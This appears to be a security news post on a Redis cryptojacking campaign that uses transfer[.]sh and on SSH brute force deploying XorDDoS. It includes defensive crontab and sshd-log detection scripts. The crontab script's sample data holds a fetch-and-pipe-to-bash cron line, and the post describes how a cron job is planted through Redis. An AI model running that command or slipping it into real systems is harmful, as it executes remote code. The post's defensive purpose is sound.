A recent report from Cado Security has revealed a new cryptojacking campaign that targets Redis database servers. The attackers are leveraging transfer[.]sh, a legitimate, open-source command-line file transfer service, to host and deliver their payloads. According to the report, the service's command-line interactivity (a file can be uploaded or fetched with a single curl command, with no account required) makes it an ideal tool for hosting and delivering malicious payloads.
The attack begins with insecure Redis deployments: the attackers use the exposed server to register a cron job, which gives them arbitrary code execution as soon as the scheduler parses it. The job retrieves a payload hosted on transfer[.]sh. That payload is a shell script that frees up memory, terminates competing miners, sets up an XMRig cryptocurrency miner, and installs the pnscan network scanner to find further vulnerable Redis servers and propagate the infection.
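To make the persistence artifact concrete, here is an added example (not code from the Cado report or from this post) that audits crontab content for the kind of entry described above. It assumes the cron job was planted by making Redis write its database file into a cron spool directory, so the file begins with the RDB magic string REDIS and the cron line is surrounded by binary noise; the sample spool, the clean crontab, the transfer[.]sh URL path and the drop-host list are all constructed for illustration and are not the campaign's actual indicators.

```python
"""Audit crontab content for remote fetch-and-execute entries.

Added example, not part of the Cado report or the original post. It assumes the
cron job was planted by making Redis write its database file into a cron spool
directory, so the file starts with the RDB magic "REDIS" and the cron line is
surrounded by binary noise. Sample data and hosts below are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

RDB_MAGIC = b"REDIS"  # every Redis RDB dump begins with "REDIS" + a 4-digit version

# Constructed approximation of a crontab written through Redis persistence:
# RDB header, one well-formed cron line, trailing binary. A cron daemon that
# skips lines it cannot parse will still honour the well-formed one.
SAMPLE_CRON_SPOOL = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x01x\n"
    b"\n*/1 * * * * curl -fsSL https://transfer.sh/EXAMPLE/init.sh | bash\n\n"
    b"\xff\x9e\x7b\x2d\xa4\x31\x00"
)

# Constructed benign crontab for comparison.
SAMPLE_CLEAN_CRONTAB = b"""# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh --quiet
@daily /usr/bin/apt-get update
"""

# Five time fields or an @-alias, then the command.
CRON_LINE = re.compile(
    r"^(?:(?:\S+\s+){5}|@(?:reboot|yearly|annually|monthly|weekly|daily|hourly)\s+)(?P<cmd>.+)$"
)
FETCHER = re.compile(r"\b(?:curl|wget)\b")
URL = re.compile(r"https?://(?P<host>[^/\s\"']+)")
# The fetched content is piped into an interpreter, or decoded first.
EXEC_SINK = re.compile(r"\|\s*(?:ba)?sh\b|\bbase64\s+(?:-d|--decode)\b")
KNOWN_DROP_HOSTS = {"transfer.sh", "pastebin.com"}  # assumed watch-list, extend as needed


@dataclass
class Finding:
    command: str
    reason: str
    host: str | None


def looks_like_redis_dump(data: bytes) -> bool:
    """True if the file is an RDB dump, i.e. Redis itself wrote this crontab."""
    return data.startswith(RDB_MAGIC)


def classify_command(cmd: str) -> Finding | None:
    """Flag a cron command that pulls remote content, worst case first."""
    url = URL.search(cmd)
    host = url["host"].lower().split(":")[0] if url else None  # drop any :port
    fetches = bool(FETCHER.search(cmd))
    executes = bool(EXEC_SINK.search(cmd))
    if host in KNOWN_DROP_HOSTS:
        return Finding(cmd, "known_drop_host", host)
    if fetches and executes:
        return Finding(cmd, "fetch_and_execute", host)
    if fetches and host:
        return Finding(cmd, "remote_fetch", host)
    return None


def audit_cron_bytes(data: bytes) -> list[Finding]:
    """Scan raw crontab bytes; tolerates binary noise around the cron lines."""
    findings: list[Finding] = []
    if looks_like_redis_dump(data):
        findings.append(Finding("", "redis_rdb_header", None))
    for raw in data.decode("utf-8", errors="replace").splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        hit = classify_command(m["cmd"])
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    import sys
    from pathlib import Path

    paths = [Path(p) for p in sys.argv[1:]]
    for path in paths:
        for f in audit_cron_bytes(path.read_bytes()):
            print(f"{path}: {f.reason} host={f.host} cmd={f.command!r}")
    if not paths:  # no files given: demonstrate on the constructed sample
        for f in audit_cron_bytes(SAMPLE_CRON_SPOOL):
            print(f"sample: {f.reason} host={f.host} cmd={f.command!r}")
```

Run it against /var/spool/cron/crontabs/*, /var/spool/cron/* and /etc/cron.d/* on a suspect host. A file that begins with the RDB header is conclusive on its own, since nothing legitimate writes a Redis dump into a cron directory. The tolerant line-by-line scan matters because cron implementations that skip unparsable lines and still run the one well-formed entry are exactly what makes the technique work.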
This attack method is not new; TeamTNT and WatchDog have used similar mechanisms in their cryptojacking operations. What is novel is the choice of transfer[.]sh as the payload host: defenders routinely monitor or block well-known code hosting domains such as pastebin[.]com, and traffic to transfer[.]sh is far less likely to attract that scrutiny.
The campaign's objective is to hijack system resources for mining cryptocurrency, but infection can have side effects beyond that. The report warns that the script's reckless reconfiguration of Linux memory management settings could easily result in data corruption or loss of system availability.
This attack on Redis servers is the latest in a series of threats to the platform, including Redigo and HeadCrab in recent months. Separately, Avertium has disclosed a new set of attacks in which SSH servers are brute-forced to deploy the XorDDoS botnet malware on compromised hosts, with the aim of launching distributed denial-of-service (DDoS) attacks against targets in China and the U.S.
Avertium observed 1.2 million unauthorized SSH connection attempts across 18 honeypots between October and December 2022 and attributed the activity to a threat actor based in China. 42% of those attempts originated from 49 IP addresses assigned to ChinaNet Jiangsu Province Network, with the rest coming from 8,000 IP addresses scattered worldwide.
Once scanning identified an open SSH port, the host was subjected to a brute-force attack against the 'root' account using a list of approximately 17,000 passwords. When the brute force succeeded, an XorDDoS bot was installed.
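As an added example (not from the Avertium report or this post), the following script implements the detection a defender would run over sshd logs for the behaviour described above: many password failures for root from one source, followed by a successful password login from the same source. The log excerpt is constructed in OpenSSH's standard syslog format using documentation IP ranges, and the failure threshold is an assumption to tune per environment.

```python
"""Spot password brute force against root in sshd logs.

Added example, not from the Avertium report or the original post. Log lines are
constructed in the standard OpenSSH syslog format; addresses are documentation
ranges. The root-failure threshold is an assumption to tune per environment.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed auth.log excerpt: one source hammers root and eventually gets in,
# a second source makes unrelated noise, a third logs in normally with a key.
SAMPLE_AUTH_LOG = """\
Dec  3 02:14:07 bastion sshd[4021]: Failed password for root from 203.0.113.45 port 50122 ssh2
Dec  3 02:14:09 bastion sshd[4021]: Failed password for root from 203.0.113.45 port 50122 ssh2
Dec  3 02:14:12 bastion sshd[4023]: Failed password for root from 203.0.113.45 port 50130 ssh2
Dec  3 02:14:15 bastion sshd[4025]: Failed password for invalid user admin from 198.51.100.9 port 41002 ssh2
Dec  3 02:14:18 bastion sshd[4027]: Failed password for root from 203.0.113.45 port 50141 ssh2
Dec  3 02:14:20 bastion sshd[4029]: Failed password for root from 203.0.113.45 port 50150 ssh2
Dec  3 02:14:23 bastion sshd[4031]: Accepted password for root from 203.0.113.45 port 50163 ssh2
Dec  3 02:15:00 bastion sshd[4040]: Accepted publickey for deploy from 192.0.2.10 port 61000 ssh2
"""

# "Failed password for root from X", "Failed password for invalid user Y from X",
# "Accepted password|publickey for U from X".
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<outcome>Failed|Accepted) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


@dataclass
class SourceStats:
    failed_total: int = 0
    failed_root: int = 0
    # Users whose password was accepted from this source after earlier failures.
    accepted_after_failures: list[str] = field(default_factory=list)


def analyse_auth_log(text: str) -> dict[str, SourceStats]:
    """Aggregate sshd outcomes per source address, in log order."""
    stats: dict[str, SourceStats] = defaultdict(SourceStats)
    for line in text.splitlines():
        m = AUTH_RE.search(line)
        if not m:
            continue
        s = stats[m["src"]]
        if m["outcome"] == "Failed":
            s.failed_total += 1
            if m["user"] == "root":
                s.failed_root += 1
        elif m["method"] == "password" and s.failed_total > 0:
            # A successful password login from a source that was failing: the
            # moment the brute force pays off and the bot gets installed.
            s.accepted_after_failures.append(m["user"])
    return dict(stats)


def alerts(stats: dict[str, SourceStats], root_threshold: int = 5) -> list[tuple[str, str]]:
    """Return (source, alert_kind) pairs; the 'accepted' alert is the urgent one."""
    out: list[tuple[str, str]] = []
    for src, s in stats.items():
        if s.accepted_after_failures:
            out.append((src, "password_accepted_after_failures"))
        if s.failed_root >= root_threshold:
            out.append((src, "root_password_bruteforce"))
    return out


if __name__ == "__main__":
    import sys

    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_AUTH_LOG
    for src, kind in alerts(analyse_auth_log(text)):
        print(f"{src}: {kind}")
```

In production you would count within a sliding time window rather than over a whole file, and you would act on the "password accepted after failures" alert first, because that is the point at which the bot is installed. The configuration counterpart is `PermitRootLogin no` and `PasswordAuthentication no` in sshd_config, which removes the target a 17,000-password list needs.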
In conclusion, the use of transfer[.]sh in this cryptojacking campaign highlights the importance of securing Redis database servers: Redis should never be reachable from untrusted networks without authentication, so bind it to private interfaces, keep protected mode enabled, require a password, and keep it up to date. Organizations should regularly review their security measures to ensure their systems are properly configured. Additionally, the rise in SSH brute-force attacks is a reminder of the importance of strong passwords and multi-factor authentication, and of disabling password logins for root altogether.